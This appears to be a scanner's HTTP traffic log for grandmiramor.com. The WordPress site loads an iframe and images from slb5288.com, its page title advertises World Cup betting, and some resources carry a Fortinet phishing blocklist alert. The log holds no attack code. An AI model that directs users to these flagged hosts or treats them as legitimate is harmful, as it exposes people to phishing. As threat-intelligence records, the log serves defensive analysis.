Accept-Language: en-US,en;q=0.5
Accept-Encoding: identity
Origin: https://grandmiramor.com
Connection: keep-alive
Referer: https://fonts.googleapis.com/
Sec-Fetch-Dest: font
Sec-Fetch-Mode: cors
Sec-Fetch-Site: cross-site

                                         
                                         216.58.207.195
HTTP/2 200 OK
content-type: font/woff2
                                        
accept-ranges: bytes
access-control-allow-origin: *
content-security-policy-report-only: require-trusted-types-for 'script'; report-uri https://csp.withgoogle.com/csp/apps-themes
cross-origin-resource-policy: cross-origin
cross-origin-opener-policy: same-origin; report-to="apps-themes"
report-to: {"group":"apps-themes","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/apps-themes"}]}
timing-allow-origin: *
content-length: 15660
x-content-type-options: nosniff
server: sffe
x-xss-protection: 0
date: Tue, 22 Nov 2022 22:17:43 GMT
expires: Wed, 22 Nov 2023 22:17:43 GMT
cache-control: public, max-age=31536000
age: 147328
last-modified: Tue, 19 Apr 2022 18:42:42 GMT
alt-svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"
X-Firefox-Spdy: h2


--- Additional Info ---
Magic:  Web Open Font Format (Version 2), TrueType, length 15660, version 1.0\012- data
Size:   15660
Md5:    d7b0b953a50fddaa88089b5b787cf719
Sha1:   2f85bc568b27659a3d6452f58f9fd7678450326d
Sha256: e79c1c1a140e6afb861074c70392db54cc65a06050de2a69162ab94eb95b0516
                                        
                                            GET /s/lato/v23/S6uyw4BMUTPHjx4wXg.woff2 HTTP/1.1 
Host: fonts.gstatic.com
                                        
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: application/font-woff2;q=1.0,application/font-woff;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: identity
Origin: https://grandmiramor.com
Connection: keep-alive
Referer: https://fonts.googleapis.com/
Sec-Fetch-Dest: font
Sec-Fetch-Mode: cors
Sec-Fetch-Site: cross-site

                                         
                                         216.58.207.195
HTTP/2 200 OK
content-type: font/woff2
                                        
accept-ranges: bytes
access-control-allow-origin: *
content-security-policy-report-only: require-trusted-types-for 'script'; report-uri https://csp.withgoogle.com/csp/apps-themes
cross-origin-resource-policy: cross-origin
cross-origin-opener-policy: same-origin; report-to="apps-themes"
report-to: {"group":"apps-themes","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/apps-themes"}]}
timing-allow-origin: *
content-length: 23580
x-content-type-options: nosniff
server: sffe
x-xss-protection: 0
date: Tue, 22 Nov 2022 17:10:21 GMT
expires: Wed, 22 Nov 2023 17:10:21 GMT
cache-control: public, max-age=31536000
age: 165770
last-modified: Tue, 26 Apr 2022 15:48:56 GMT
alt-svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"
X-Firefox-Spdy: h2


--- Additional Info ---
Magic:  Web Open Font Format (Version 2), TrueType, length 23580, version 1.0\012- data
Size:   23580
Md5:    e1b3b5908c9cf23dfb2b9c52b9a023ab
Sha1:   fcd4136085f2a03481d9958cc6793a5ed98e714c
Sha256: 918b7dc3e2e2d015c16ce08b57bcb64d2253bafc1707658f361e72865498e537
                                        
                                            GET /images/core/emoji/14.0.0/svg/2764.svg HTTP/1.1 
Host: s.w.org
                                        
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: image/avif,image/webp,*/*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Referer: https://grandmiramor.com/
Sec-Fetch-Dest: image
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: cross-site

                                         
                                         192.0.77.48
HTTP/2 200 OK
content-type: image/svg+xml
                                        
server: nginx
date: Thu, 24 Nov 2022 15:13:11 GMT
content-length: 368
last-modified: Tue, 12 Apr 2022 03:47:50 GMT
x-frame-options: SAMEORIGIN
expires: Thu, 31 Dec 2037 23:55:55 GMT
cache-control: max-age=315360000
access-control-allow-methods: GET, HEAD
access-control-allow-origin: *
x-nc: HIT arn 2
x-content-type-options: nosniff
accept-ranges: bytes
X-Firefox-Spdy: h2


--- Additional Info ---
Magic:  SVG Scalable Vector Graphics image\012- , ASCII text, with very long lines (368), with no line terminators
Size:   368
Md5:    0483f2b648dcc986d01385062052ae1c
Sha1:   61bd815f1497863265a76d92623042835e5e7fe2
Sha256: 09a743ee0c32ca57c9be64b13b29c396310d1dd309cb4d7d3be722e47db95f27
                                        
                                            POST /gts1c3 HTTP/1.1 
Host: ocsp.pki.goog
                                        
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/ocsp-request
Content-Length: 84
Connection: keep-alive
Pragma: no-cache
Cache-Control: no-cache

                                         
                                         142.250.74.3
HTTP/1.1 200 OK
Content-Type: application/ocsp-response
                                        
Date: Thu, 24 Nov 2022 15:13:11 GMT
Cache-Control: public, max-age=14400
Server: ocsp_responder
Content-Length: 472
X-XSS-Protection: 0
X-Frame-Options: SAMEORIGIN

                                        
                                            GET /go/ob.html HTTP/1.1 
Host: www.slb5288.com
                                        
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Referer: https://grandmiramor.com/
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: iframe
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: cross-site

                                         
                                         103.35.116.217
HTTP/1.1 200 OK
Content-Type: text/html
                                        
Server: nginx
Date: Thu, 24 Nov 2022 15:13:11 GMT
Last-Modified: Thu, 24 Nov 2022 11:05:59 GMT
Transfer-Encoding: chunked
Connection: keep-alive
Vary: Accept-Encoding
ETag: W/"637f5017-def"
Content-Encoding: gzip


--- Additional Info ---
Magic:  HTML document text\012- HTML document text\012- HTML document text\012- HTML document text\012- HTML document text\012- exported SGML document, Unicode text, UTF-8 text
Size:   1418
Md5:    112c461e917662fdfd85f536100a6b15
Sha1:   ac4efcd4b63d136bdc2a295d842402be72e6b8e9
Sha256: 8574ca49c5cb26d157929321f55bb7482e5d98c84b300d01b04ffe6c8eff2908
                                        
                                            GET /wp-content/themes/educenter/assets/library/fontawesome/webfonts/fa-solid-900.woff2 HTTP/1.1 
Host: grandmiramor.com
                                        
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: application/font-woff2;q=1.0,application/font-woff;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: identity
Connection: keep-alive
Referer: https://grandmiramor.com/wp-content/themes/educenter/assets/library/fontawesome/css/all.min.css?ver=6.1.1
Sec-Fetch-Dest: font
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin
TE: trailers

                                         
                                         156.240.38.111
HTTP/2 200 OK
content-type: font/woff2
                                        
server: nginx
date: Thu, 24 Nov 2022 15:13:11 GMT
content-length: 75728
last-modified: Tue, 01 Nov 2022 08:25:13 GMT
etag: "6360d7e9-127d0"
accept-ranges: bytes
X-Firefox-Spdy: h2


--- Additional Info ---
Magic:  Web Open Font Format (Version 2), TrueType, length 75728, version 330.32636\012- data
Size:   75728
Md5:    44d537ab79f921fde5a28b2c1636f397
Sha1:   b2879f9e1d0985a96842bf7f55a2b2cc4c636d04
Sha256: 3d1080625d3030e88357b3ac9aa377dcec23f1b529c4ad03f7a9a435ccae04be

Alerts:
  Blocklists:
    - fortinet: Phishing
                                        
                                            GET /hm.js?14c80326baa455e60c7d9ecfd2eeb6be HTTP/1.1 
Host: hm.baidu.com
                                        
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Referer: https://grandmiramor.com/
Sec-Fetch-Dest: script
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: cross-site

                                         
                                         103.235.46.191
HTTP/1.1 200 OK
Content-Type: application/javascript
                                        
Cache-Control: max-age=0, must-revalidate
Content-Encoding: gzip
Content-Length: 11259
Date: Thu, 24 Nov 2022 15:13:11 GMT
Etag: 5fe6408f9519c25bd0bd812a6254d5a0
P3p: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Server: apache
Set-Cookie: HMACCOUNT=ABC3961F7B7F395C; Path=/; Domain=hm.baidu.com; Expires=Sun, 18 Jan 2038 00:00:00 GMT
Strict-Transport-Security: max-age=172800


--- Additional Info ---
Magic:  ASCII text, with very long lines (621)
Size:   11259
Md5:    3feae75a60dcfdf799c2eef8f8d45afe
Sha1:   d2602ffb1c494fdf3c8e4bdb156f72918e1cb0a0
Sha256: f2b06c7d5e4adefe98003c5cc8f10cc1158c696dad9b2de092a1e50d4a3609e6
                                        
                                            GET /hm.js?156b2b1f9196a3c767b14e29e3c17dfb HTTP/1.1 
Host: hm.baidu.com
                                        
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Referer: https://grandmiramor.com/
Sec-Fetch-Dest: script
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: cross-site

                                         
                                         103.235.46.191
HTTP/1.1 200 OK
Content-Type: application/javascript
                                        
Cache-Control: max-age=0, must-revalidate
Content-Encoding: gzip
Content-Length: 11269
Date: Thu, 24 Nov 2022 15:13:11 GMT
Etag: 16fff19e42862c40f36c31a0cb0298be
P3p: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Server: apache
Set-Cookie: HMACCOUNT=AA234141C1840204; Path=/; Domain=hm.baidu.com; Expires=Sun, 18 Jan 2038 00:00:00 GMT
Strict-Transport-Security: max-age=172800


--- Additional Info ---
Magic:  ASCII text, with very long lines (631)
Size:   11269
Md5:    c22df1d02e9e58c2d2b995006e038d04
Sha1:   db856625e561eb34fac63688426150dd2792e579
Sha256: 072fe236430ea9a34016b61ab1132661186ed10a30f76bc5a5bcd2bee643e6cd
                                        
                                            GET /go/css/min.css HTTP/1.1 
Host: www.slb5288.com
                                        
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: text/css,*/*;q=0.1
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Referer: https://www.slb5288.com/go/ob.html
Sec-Fetch-Dest: style
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: same-origin

                                         
                                         103.35.116.217
HTTP/1.1 200 OK
Content-Type: text/css
                                        
Server: nginx
Date: Thu, 24 Nov 2022 15:13:11 GMT
Last-Modified: Sun, 16 Oct 2022 05:46:45 GMT
Transfer-Encoding: chunked
Connection: keep-alive
Vary: Accept-Encoding
ETag: W/"634b9ac5-48eb"
Content-Encoding: gzip


--- Additional Info ---
Magic:  troff or preprocessor input, ASCII text
Size:   2956
Md5:    43d31051a45ed743997d73df9f01c25b
Sha1:   098ac69df747ab9a4726a34fd7e8adc5b75a39c0
Sha256: d93a27383439b61c2b1d165f333b4f1117fd5f51221b6492ea1fcc234a01f1c6
                                        
                                            GET /hm.gif?cc=1&ck=1&cl=24-bit&ds=1280x1024&vl=939&et=0&ja=0&ln=en-us&lo=0&rnd=1829163586&si=14c80326baa455e60c7d9ecfd2eeb6be&v=1.3.0&lv=1&sn=60806&r=0&ww=1280&u=https%3A%2F%2Fgrandmiramor.com%2F&tt=%E4%B8%96%E7%95%8C%E6%9D%AF%E6%8A%95%E6%B3%A8%E5%AE%98%E7%BD%91(%E4%B8%AD%E5%9B%BD)%E6%9C%89%E9%99%90%E5%85%AC%E5%8F%B8 HTTP/1.1 
Host: hm.baidu.com
                                        
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: image/avif,image/webp,*/*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Referer: https://grandmiramor.com/
Sec-Fetch-Dest: image
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: cross-site

                                         
                                         103.235.46.191
HTTP/1.1 200 OK
Content-Type: image/gif
                                        
Cache-Control: private, max-age=0, no-cache
Content-Length: 43
Date: Thu, 24 Nov 2022 15:13:11 GMT
P3p: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Pragma: no-cache
Server: apache
Set-Cookie: HMACCOUNT=338E164357663804; Path=/; Domain=hm.baidu.com; Expires=Sun, 18 Jan 2038 00:00:00 GMT
Strict-Transport-Security: max-age=172800
X-Content-Type-Options: nosniff


--- Additional Info ---
Magic:  GIF image data, version 89a, 1 x 1\012- data
Size:   43
Md5:    ad4b0f606e0f8465bc4c4c170b37e1a3
Sha1:   50b30fd5f87c85fe5cba2635cb83316ca71250d7
Sha256: cf4724b2f736ed1a0ae6bc28f1ead963d9cd2c1fd87b6ef32e7799fc1c5c8bda
                                        
                                            GET /hm.gif?cc=1&ck=1&cl=24-bit&ds=1280x1024&vl=939&et=0&ja=0&ln=en-us&lo=0&rnd=63807918&si=156b2b1f9196a3c767b14e29e3c17dfb&v=1.3.0&lv=1&sn=60806&r=0&ww=1280&u=https%3A%2F%2Fgrandmiramor.com%2F&tt=%E4%B8%96%E7%95%8C%E6%9D%AF%E6%8A%95%E6%B3%A8%E5%AE%98%E7%BD%91(%E4%B8%AD%E5%9B%BD)%E6%9C%89%E9%99%90%E5%85%AC%E5%8F%B8 HTTP/1.1 
Host: hm.baidu.com
                                        
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: image/avif,image/webp,*/*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Referer: https://grandmiramor.com/
Sec-Fetch-Dest: image
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: cross-site

                                         
                                         103.235.46.191
HTTP/1.1 200 OK
Content-Type: image/gif
                                        
Cache-Control: private, max-age=0, no-cache
Content-Length: 43
Date: Thu, 24 Nov 2022 15:13:11 GMT
P3p: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Pragma: no-cache
Server: apache
Set-Cookie: HMACCOUNT=7C4E50C84E7C018A; Path=/; Domain=hm.baidu.com; Expires=Sun, 18 Jan 2038 00:00:00 GMT
Strict-Transport-Security: max-age=172800
X-Content-Type-Options: nosniff


--- Additional Info ---
Magic:  GIF image data, version 89a, 1 x 1\012- data
Size:   43
Md5:    ad4b0f606e0f8465bc4c4c170b37e1a3
Sha1:   50b30fd5f87c85fe5cba2635cb83316ca71250d7
Sha256: cf4724b2f736ed1a0ae6bc28f1ead963d9cd2c1fd87b6ef32e7799fc1c5c8bda
                                        
                                            GET /go/images/icon01.png HTTP/1.1 
Host: www.slb5288.com
                                        
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: image/avif,image/webp,*/*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Referer: https://www.slb5288.com/go/css/min.css
Sec-Fetch-Dest: image
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: same-origin

                                         
                                         103.35.116.217
HTTP/1.1 200 OK
Content-Type: image/png
                                        
Server: nginx
Date: Thu, 24 Nov 2022 15:13:12 GMT
Content-Length: 450
Last-Modified: Fri, 04 Jun 2021 09:15:34 GMT
Connection: keep-alive
ETag: "60b9ef36-1c2"
Accept-Ranges: bytes


--- Additional Info ---
Magic:  PNG image data, 20 x 20, 8-bit colormap, non-interlaced\012- data
Size:   450
Md5:    6df3b8ce3e08104b9ec52418b934319e
Sha1:   4cee4b27829f666ff918140a5d340a51ff8cdc99
Sha256: 296ccae6f63f1686815968e7a5a11be031168f91b8f1cb37ed181a0a3ce50196
                                        
                                            GET /go/images/ob.svg HTTP/1.1 
Host: www.slb5288.com
                                        
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: image/avif,image/webp,*/*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Referer: https://www.slb5288.com/go/css/min.css
Sec-Fetch-Dest: image
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: same-origin

                                         
                                         103.35.116.217
HTTP/1.1 200 OK
Content-Type: image/svg+xml
                                        
Server: nginx
Date: Thu, 24 Nov 2022 15:13:12 GMT
Content-Length: 29784
Last-Modified: Wed, 09 Mar 2022 16:43:27 GMT
Connection: keep-alive
ETag: "6228d92f-7458"
Accept-Ranges: bytes


--- Additional Info ---
Magic:  SVG Scalable Vector Graphics image\012- XML 1.0 document text\012- XML document text\012- HTML document text\012- exported SGML document, Unicode text, UTF-8 text, with very long lines (14296)
Size:   29784
Md5:    465c91a62aca28e28d2e1c2117ab004d
Sha1:   3f3525fe144890a2ca964a7df13c9228a3c86e9c
Sha256: e6ef5e7770544e9dace3205928f4b6f3af911e09a71c47a571a2610d8fd5bb3b
                                        
                                            GET /wp-includes/images/w-logo-blue-white-bg.png HTTP/1.1 
Host: grandmiramor.com
                                        
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: image/avif,image/webp,*/*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Referer: https://grandmiramor.com/
Connection: keep-alive
Cookie: Hm_lvt_14c80326baa455e60c7d9ecfd2eeb6be=1669302791; Hm_lpvt_14c80326baa455e60c7d9ecfd2eeb6be=1669302791; Hm_lvt_156b2b1f9196a3c767b14e29e3c17dfb=1669302791; Hm_lpvt_156b2b1f9196a3c767b14e29e3c17dfb=1669302791
Sec-Fetch-Dest: image
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: same-origin
TE: trailers

                                         
                                         156.240.38.111
HTTP/2 200 OK
content-type: image/png
                                        
server: nginx
date: Thu, 24 Nov 2022 15:13:12 GMT
content-length: 4119
last-modified: Tue, 01 Nov 2022 08:14:35 GMT
etag: "6360d56b-1017"
expires: Sat, 24 Dec 2022 15:13:12 GMT
cache-control: max-age=2592000
accept-ranges: bytes
X-Firefox-Spdy: h2


--- Additional Info ---
Magic:  PNG image data, 80 x 80, 8-bit/color RGBA, non-interlaced\012- data
Size:   4119
Md5:    000bf649cc8f6bf27cfb04d1bcdcd3c7
Sha1:   d73d2f6d74ec6cdcbae07955592962e77d8ae814
Sha256: 6bdb369337ac2496761c6f063bffea0aa6a91d4662279c399071a468251f51f0
                                        
                                            GET /go/images/1614077699664025.png HTTP/1.1 
Host: www.slb5288.com
                                        
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: image/avif,image/webp,*/*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Referer: https://www.slb5288.com/go/css/min.css
Sec-Fetch-Dest: image
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: same-origin

                                         
                                         103.35.116.217
HTTP/1.1 200 OK
Content-Type: image/png
                                        
Server: nginx
Date: Thu, 24 Nov 2022 15:13:12 GMT
Content-Length: 7874
Last-Modified: Fri, 04 Jun 2021 09:37:36 GMT
Connection: keep-alive
ETag: "60b9f460-1ec2"
Accept-Ranges: bytes


--- Additional Info ---
Magic:  PNG image data, 186 x 100, 8-bit/color RGBA, non-interlaced\012- data
Size:   7874
Md5:    7c5d462fbb022452c530aa98a278e595
Sha1:   f86a4bbca9ebecb5c868e20ead846b13f9df09f7
Sha256: 6fc74ddfec00da7f7e3a16e8d28b8c233faa3a04eee6a88ce4621f6d7d12c094
                                        
                                            GET /go/images/1614077820980163.png HTTP/1.1 
Host: www.slb5288.com
                                        
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: image/avif,image/webp,*/*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Referer: https://www.slb5288.com/go/css/min.css
Sec-Fetch-Dest: image
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: same-origin

                                         
                                         103.35.116.217
HTTP/1.1 200 OK
Content-Type: image/png
                                        
Server: nginx
Date: Thu, 24 Nov 2022 15:13:12 GMT
Content-Length: 32745
Last-Modified: Fri, 04 Jun 2021 09:37:56 GMT
Connection: keep-alive
ETag: "60b9f474-7fe9"
Accept-Ranges: bytes


--- Additional Info ---
Magic:  PNG image data, 190 x 100, 8-bit/color RGBA, non-interlaced\012- data
Size:   32745
Md5:    63690442826dcd3544e0a50c3244b884
Sha1:   b3830948cc7b69b2734a4b2ecfb0c0b100630740
Sha256: ea93c09b5bbc174fcbb3d5ed6813434e0bb0a68ca86452023c1984f2f809afee
                                        
                                            GET /wp-content/themes/educenter/assets/library/sticky/jquery.sticky.js?ver=1 HTTP/1.1 
Host: grandmiramor.com
                                        
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Referer: https://grandmiramor.com/
Sec-Fetch-Dest: script
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: same-origin
TE: trailers

                                         
                                         156.240.38.111
HTTP/2 200 OK
content-type: application/javascript
                                        
server: nginx
date: Thu, 24 Nov 2022 15:13:09 GMT
last-modified: Tue, 01 Nov 2022 08:25:13 GMT
vary: Accept-Encoding
etag: W/"6360d7e9-2765"
expires: Fri, 25 Nov 2022 03:13:09 GMT
cache-control: max-age=43200
content-encoding: gzip
X-Firefox-Spdy: h2


--- Additional Info ---
Magic:  data
Size:   10202
Md5:    6e1e6290cdded687c430f180c3a8f42f
Sha1:   b9c76bcabab7fff5d31092e95ab1b478b5a61a33
Sha256: b74024b26f63432757b69c4a13724bc50e9e10858999cce687d0328deed68253
                                        
                                            GET /go/images/1614077771187432.png HTTP/1.1 
Host: www.slb5288.com
                                        
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: image/avif,image/webp,*/*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Referer: https://www.slb5288.com/go/css/min.css
Sec-Fetch-Dest: image
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: same-origin

                                         
                                         103.35.116.217
HTTP/1.1 200 OK
Content-Type: image/png
                                        
Server: nginx
Date: Thu, 24 Nov 2022 15:13:12 GMT
Content-Length: 5530
Last-Modified: Fri, 04 Jun 2021 09:37:48 GMT
Connection: keep-alive
ETag: "60b9f46c-159a"
Accept-Ranges: bytes


--- Additional Info ---
Magic:  PNG image data, 100 x 100, 8-bit/color RGBA, non-interlaced\012- data
Size:   5530
Md5:    ae8306606526424b77fd4ea4219226c5
Sha1:   afe333864b9dd1290aa1ab21a517cf8ca922695d
Sha256: 3a4d8b2face6ab45c9409c7b49bc5e930f3210237136d12d8d89397d090cbc1e
                                        
                                            GET /go/images/1614077789259639.png HTTP/1.1 
Host: www.slb5288.com
                                        
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: image/avif,image/webp,*/*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Referer: https://www.slb5288.com/go/css/min.css
Sec-Fetch-Dest: image
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: same-origin

                                         
                                         103.35.116.217
HTTP/1.1 200 OK
Content-Type: image/png
                                        
Server: nginx
Date: Thu, 24 Nov 2022 15:13:12 GMT
Content-Length: 3775
Last-Modified: Fri, 04 Jun 2021 09:37:52 GMT
Connection: keep-alive
ETag: "60b9f470-ebf"
Accept-Ranges: bytes


--- Additional Info ---
Magic:  PNG image data, 100 x 100, 8-bit/color RGBA, non-interlaced\012- data
Size:   3775
Md5:    5a3e9e46aae819564c16d50873adb017
Sha1:   b1f97fb9637244e7c4a1feb0385ac6c4e82246b9
Sha256: 52c52d983997dfadd3579e7a500316b21eb6cc65bc798aec5951291f8d0a6f49
                                        
                                            GET /go/images/1614077889968827.png HTTP/1.1 
Host: www.slb5288.com
                                        
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: image/avif,image/webp,*/*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Referer: https://www.slb5288.com/go/css/min.css
Sec-Fetch-Dest: image
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: same-origin

                                         
                                         103.35.116.217
HTTP/1.1 200 OK
Content-Type: image/png
                                        
Server: nginx
Date: Thu, 24 Nov 2022 15:13:12 GMT
Content-Length: 13011
Last-Modified: Fri, 04 Jun 2021 09:38:08 GMT
Connection: keep-alive
ETag: "60b9f480-32d3"
Accept-Ranges: bytes


--- Additional Info ---
Magic:  PNG image data, 216 x 100, 8-bit/color RGBA, non-interlaced\012- data
Size:   13011
Md5:    03ac0516b399dda3fbefb3bebe2b5faf
Sha1:   00d4d629cd65fadce5b8eb1e7f150dad13cfe673
Sha256: 38691bc92f3abcebf79a98ad22da7ef39b8a93c29b5daff6ba3ec9fa1d5e4f8e
                                        
                                            GET /wp-content/themes/educenter/assets/library/waypoints/jquery.waypoints.min.js?ver=4.0.0 HTTP/1.1 
Host: grandmiramor.com
                                        
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Referer: https://grandmiramor.com/
Sec-Fetch-Dest: script
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: same-origin
TE: trailers

                                         
                                         156.240.38.111
HTTP/2 200 OK
content-type: application/javascript
                                        
server: nginx
date: Thu, 24 Nov 2022 15:13:09 GMT
last-modified: Tue, 01 Nov 2022 08:25:13 GMT
vary: Accept-Encoding
etag: W/"6360d7e9-2281"
expires: Fri, 25 Nov 2022 03:13:09 GMT
cache-control: max-age=43200
content-encoding: gzip
X-Firefox-Spdy: h2


--- Additional Info ---
Magic:  data
Size:   27834
Md5:    c0ca259aba1c390ca168f6fd36494246
Sha1:   30c7e7fe69d93c03c70ca02ab28b916f8c1019db
Sha256: 7e0781d07aabbf0fd2f124dc9e77805453e030b07acda3195eb3de9abfa36c67

Alerts:
  Blocklists:
    - fortinet: Phishing
                                        
                                            GET /wp-includes/css/dist/block-library/style.min.css?ver=6.1.1 HTTP/1.1 
Host: grandmiramor.com
                                        
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: text/css,*/*;q=0.1
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Referer: https://grandmiramor.com/
Sec-Fetch-Dest: style
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: same-origin
TE: trailers

                                         
                                         156.240.38.111
HTTP/2 200 OK
content-type: text/css
                                        
server: nginx
date: Thu, 24 Nov 2022 15:13:09 GMT
last-modified: Tue, 15 Nov 2022 23:27:06 GMT
vary: Accept-Encoding
etag: W/"6374204a-172a9"
expires: Fri, 25 Nov 2022 03:13:09 GMT
cache-control: max-age=43200
content-encoding: gzip
X-Firefox-Spdy: h2


--- Additional Info ---
Magic:  data
Size:   20084
Md5:    9a5103b84dd4c30bdcf5e4b4a8332374
Sha1:   48316cf6c0453b11f8cad9f032c4bd4a771ee3a1
Sha256: 100888c6a8799a494093fb526ac4f1d785618b2149f760cbf23c0aa446b9b6e8
                                        
                                            GET /go/images/1614077927427474.png HTTP/1.1 
Host: www.slb5288.com
                                        
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: image/avif,image/webp,*/*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Referer: https://www.slb5288.com/go/css/min.css
Sec-Fetch-Dest: image
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: same-origin

                                         
                                         103.35.116.217
HTTP/1.1 200 OK
Content-Type: image/png
                                        
Server: nginx
Date: Thu, 24 Nov 2022 15:13:12 GMT
Content-Length: 12265
Last-Modified: Fri, 04 Jun 2021 09:38:14 GMT
Connection: keep-alive
ETag: "60b9f486-2fe9"
Accept-Ranges: bytes


--- Additional Info ---
Magic:  PNG image data, 200 x 100, 8-bit/color RGBA, non-interlaced\012- data
Size:   12265
